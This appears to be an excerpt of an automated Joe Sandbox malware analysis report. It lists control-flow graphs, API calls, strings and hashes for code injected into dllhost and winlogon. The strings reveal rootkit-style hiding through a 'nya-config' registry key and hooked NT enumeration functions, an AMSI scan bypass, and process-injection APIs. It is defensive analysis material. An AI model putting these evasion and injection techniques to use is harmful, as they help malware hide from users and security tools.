1400028b6-1400028ca Wow64SetThreadContext 390->395 396 140002634 391->396 397 14000262e-140002632 391->397 398 14000280f-14000283e call 140002930 VirtualProtectEx 392->398 393->398 394->355 399 140002712-140002720 ResumeThread 394->399 395->387 400 140002638-140002665 call 140002930 VirtualProtectEx 396->400 397->400 398->387 407 140002844-140002852 398->407 399->355 403 140002726-14000272b 399->403 400->387 406 14000266b-14000267c 400->406 403->348 406->381 406->386 407->379 407->383
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                      • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                      • API String ID: 1036100660-1371749706
                                                                      • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                                      • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                                                      • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                                      • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                                      • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                                      • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                                      • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                      • String ID:
                                                                      • API String ID: 4184240511-0
                                                                      • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                                      • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                                                      • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                                      • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                                      • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                                      • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                                      • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Delete$CloseEnumOpen
                                                                      • String ID: SOFTWARE\$nya-config
                                                                      • API String ID: 3013565938-2636501262
                                                                      • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                      • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                                      • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                      • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                                      • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                                                      • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                                      • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 1646373207-2227199552
                                                                      • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                      • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                                      • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                      • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                                      • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                                      • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                                      • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                                      • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                                      • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                                      • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                                      Execution Graph

                                                                      Execution Coverage:1.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:2.7%
                                                                      Total number of Nodes:111
                                                                      Total number of Limit Nodes:17
                                                                      execution_graph 22449 1e858982c80 TlsGetValue TlsGetValue TlsGetValue 22450 1e858982d51 NtEnumerateValueKey 22449->22450 22451 1e858982cd9 22449->22451 22453 1e858982d4c 22450->22453 22457 1e858982d86 22450->22457 22451->22450 22456 1e858982ce1 22451->22456 22452 1e858982d2d NtEnumerateValueKey 22452->22453 22452->22456 22454 1e858982da0 NtEnumerateValueKey 22454->22457 22455 1e858982e06 TlsSetValue TlsSetValue TlsSetValue 22455->22453 22456->22452 22456->22453 22456->22455 22460 1e858983f88 22456->22460 22457->22453 22457->22454 22457->22455 22459 1e858983f88 StrCmpNIW 22457->22459 22459->22457 22461 1e858983f95 StrCmpNIW 22460->22461 22462 1e858983faa 22460->22462 22461->22462 22462->22456 22463 1e858986430 22464 1e85898643d 22463->22464 22465 1e858986449 22464->22465 22468 1e85898655a 22464->22468 22466 1e85898647e 22465->22466 22467 1e8589864cd 22465->22467 22469 1e8589864a6 SetThreadContext 22466->22469 22470 1e858986581 VirtualProtect FlushInstructionCache 22468->22470 22472 1e85898663e 22468->22472 22469->22467 22470->22468 22471 1e85898665e 22482 1e858985530 GetCurrentProcess 22471->22482 22472->22471 22481 1e858984b20 VirtualFree 22472->22481 22475 1e858986663 22476 1e8589866b7 22475->22476 22477 1e858986677 ResumeThread 22475->22477 22486 1e858988070 8 API calls 2 library calls 22476->22486 22478 1e8589866ab 22477->22478 22478->22475 22480 1e8589866ff 22481->22471 22483 1e85898554c 22482->22483 22484 1e858985562 VirtualProtect FlushInstructionCache 22483->22484 22485 1e858985593 22483->22485 22484->22483 22485->22475 22486->22480 22487 1e85898f370 VirtualProtect 22488 1e858981bc4 22495 1e858981724 GetProcessHeap HeapAlloc 22488->22495 22490 1e858981bda SleepEx 22491 1e858981724 50 API calls 22490->22491 22493 1e858981bd3 22491->22493 22493->22490 22494 1e85898159c StrCmpIW StrCmpW 22493->22494 22546 1e8589819b0 12 API calls 22493->22546 22494->22493 22547 1e858981264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22495->22547 22497 1e85898174c 22548 1e858981000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22497->22548 22499 1e858981754 22549 1e858981264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22499->22549 22501 1e85898175d 22550 1e858981264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22501->22550 22503 1e858981766 22551 1e858981264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22503->22551 22505 1e85898176f 22552 1e858981000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22505->22552 22507 1e858981778 22553 1e858981000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22507->22553 22509 1e858981781 22554 1e858981000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22509->22554 22511 1e85898178a RegOpenKeyExW 22512 1e8589819a2 22511->22512 22513 1e8589817bc RegOpenKeyExW 22511->22513 22512->22493 22514 1e8589817e5 22513->22514 22515 1e8589817fb RegOpenKeyExW 22513->22515 22561 1e8589812b8 16 API calls 22514->22561 22517 1e858981836 RegOpenKeyExW 22515->22517 22518 1e85898181f 22515->22518 22521 1e858981871 RegOpenKeyExW 22517->22521 22522 1e85898185a 22517->22522 22555 1e85898104c RegQueryInfoKeyW 22518->22555 22519 1e8589817f1 RegCloseKey 22519->22515 22525 1e858981895 22521->22525 22526 1e8589818ac RegOpenKeyExW 22521->22526 22562 1e8589812b8 16 API calls 22522->22562 22563 1e8589812b8 16 API calls 22525->22563 22528 1e8589818d0 22526->22528 22529 1e8589818e7 RegOpenKeyExW 22526->22529 22564 1e8589812b8 16 API calls 22528->22564 22533 1e858981922 RegOpenKeyExW 22529->22533 22534 1e85898190b 22529->22534 22530 1e858981867 RegCloseKey 22530->22521 22531 1e8589818a2 RegCloseKey 22531->22526 22537 1e858981946 22533->22537 22538 1e85898195d RegOpenKeyExW 22533->22538 22536 1e85898104c 6 API calls 22534->22536 22535 1e8589818dd RegCloseKey 22535->22529 22539 1e858981918 RegCloseKey 22536->22539 22540 1e85898104c 6 API calls 22537->22540 22541 1e858981981 22538->22541 22542 1e858981998 RegCloseKey 22538->22542 22539->22533 22544 1e858981953 RegCloseKey 22540->22544 22543 1e85898104c 6 API calls 22541->22543 22542->22512 22545 1e85898198e RegCloseKey 22543->22545 22544->22538 22545->22542 22547->22497 22548->22499 22549->22501 22550->22503 22551->22505 22552->22507 22553->22509 22554->22511 22556 1e8589811b5 RegCloseKey 22555->22556 22557 1e8589810bf 22555->22557 22556->22517 22557->22556 22558 1e8589810cf RegEnumValueW 22557->22558 22559 1e858981125 22558->22559 22559->22556 22559->22558 22560 1e85898114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22559->22560 22560->22559 22561->22519 22562->22530 22563->22531 22564->22535 22567 1e8589841f9 22570 1e858984146 _invalid_parameter_noinfo 22567->22570 22568 1e8589841b0 22569 1e858984196 VirtualQuery 22569->22568 22569->22570 22570->22568 22570->22569 22571 1e8589841ca VirtualAlloc 22570->22571 22571->22568 22572 1e8589841fb GetLastError 22571->22572 22572->22568 22572->22570 22573 1e858981e3c LoadLibraryA GetProcAddress 22574 1e858981e62 SleepEx 22573->22574 22575 1e858981e6f 22573->22575 22574->22574 22576 1e858985c8d 22578 1e858985c94 22576->22578 22577 1e858985cfb 22578->22577 22579 1e858985d77 VirtualProtect 22578->22579 22580 1e858985db1 22579->22580 22581 1e858985da3 GetLastError 22579->22581 22581->22580

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Enumerate
                                                                      • String ID:
                                                                      • API String ID: 3520290360-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: 0833e6691694dc9afc731050ea6fb8f24071af9f4e40e4157bf55a395e743196
                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: 92519E36224682C7E364DB56E844AAEF7A1FB88B84F50413ADE4E43B54DF78C945CF04

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 223 1e858981e3c-1e858981e60 LoadLibraryA GetProcAddress 224 1e858981e62-1e858981e6d SleepEx 223->224 225 1e858981e6f-1e858981e73 223->225 224->224
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: 79fbd4b1e2d6ff2d809dd52659f0ebe6e8b782c5e36dc7462948b81879af993b
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: 4DD06730632681D6FA187B11EC553EDB263AF64B01FC40477CD0E012A0EE2C8559C750

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: c42f270a00c6135dc1a9ecc6a12cf34b70f95b24d6027914614f5413ef0ea847
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: 6571E836721A91C6EB20AF76E8916DDB3A5FF84B88F401122DE4E57B68EF38C544C740

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 752fe234c95ab1fb3c1fa53d8dc745e5f0498f0841882d0054117479748036ef
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: 7D515C74630ACAE6EB14EFA4EC557DCF722AF44748FC049339C0E46565EE78825ACB84

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: 200edfd6bcf0b3a0727e3d76c87f312e318cca55a30b54c9bbf3568c39774df1
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: 5F51BA31721B86D5EA249F66E8403EEB291AF48BB0F5817369E3E477D1EF38D445CA40

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 151 1e858986270-1e858986297 152 1e858986299-1e8589862a8 151->152 153 1e8589862ab-1e8589862b6 GetCurrentThreadId 151->153 152->153 154 1e8589862c2-1e8589862c9 153->154 155 1e8589862b8-1e8589862bd 153->155 157 1e8589862db-1e8589862ef 154->157 158 1e8589862cb-1e8589862d6 call 1e8589860a0 154->158 156 1e8589866ef-1e858986706 call 1e858988070 155->156 161 1e8589862fe-1e858986304 157->161 158->156 164 1e8589863d5-1e8589863f6 161->164 165 1e85898630a-1e858986313 161->165 169 1e8589863fc-1e85898641c GetThreadContext 164->169 170 1e85898655f-1e858986570 call 1e858987bff 164->170 167 1e858986315-1e858986358 call 1e858993a40 165->167 168 1e85898635a-1e8589863cd call 1e858984c50 call 1e858984bf0 call 1e858984bb0 165->168 181 1e8589863d0 167->181 168->181 174 1e858986422-1e858986443 169->174 175 1e85898655a 169->175 185 1e858986575-1e85898657b 170->185 174->175 184 1e858986449-1e858986452 174->184 175->170 181->161 187 1e8589864d2-1e8589864e3 184->187 188 1e858986454-1e858986465 184->188 189 1e858986581-1e8589865d8 VirtualProtect FlushInstructionCache 185->189 190 1e85898663e-1e85898664e 185->190 193 1e858986555 187->193 194 1e8589864e5-1e858986503 187->194 198 1e858986467-1e85898647c 188->198 199 1e8589864cd 188->199 191 1e858986609-1e858986639 call 1e858987fdc 189->191 192 1e8589865da-1e8589865e4 189->192 196 1e858986650-1e858986657 190->196 197 1e85898665e-1e85898666a call 1e858985530 190->197 191->185 192->191 200 1e8589865e6-1e858986601 call 1e858984ad0 192->200 194->193 201 1e858986505-1e858986550 call 1e858984040 call 1e858987c1d 194->201 196->197 203 1e858986659 call 1e858984b20 196->203 215 1e85898666f-1e858986675 197->215 198->199 205 1e85898647e-1e8589864c8 call 1e8589840b0 SetThreadContext 198->205 199->193 200->191 201->193 203->197 205->199 217 1e8589866b7-1e8589866d5 215->217 218 1e858986677-1e8589866b5 ResumeThread call 1e858987fdc 215->218 220 1e8589866d7-1e8589866e6 217->220 221 1e8589866e9 217->221 218->215 220->221 221->156
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
                                                                      • Instruction ID: 46800f2f999124dcc45fd1d2e9341ff6952696380e717fe7da1eb633ac595a53
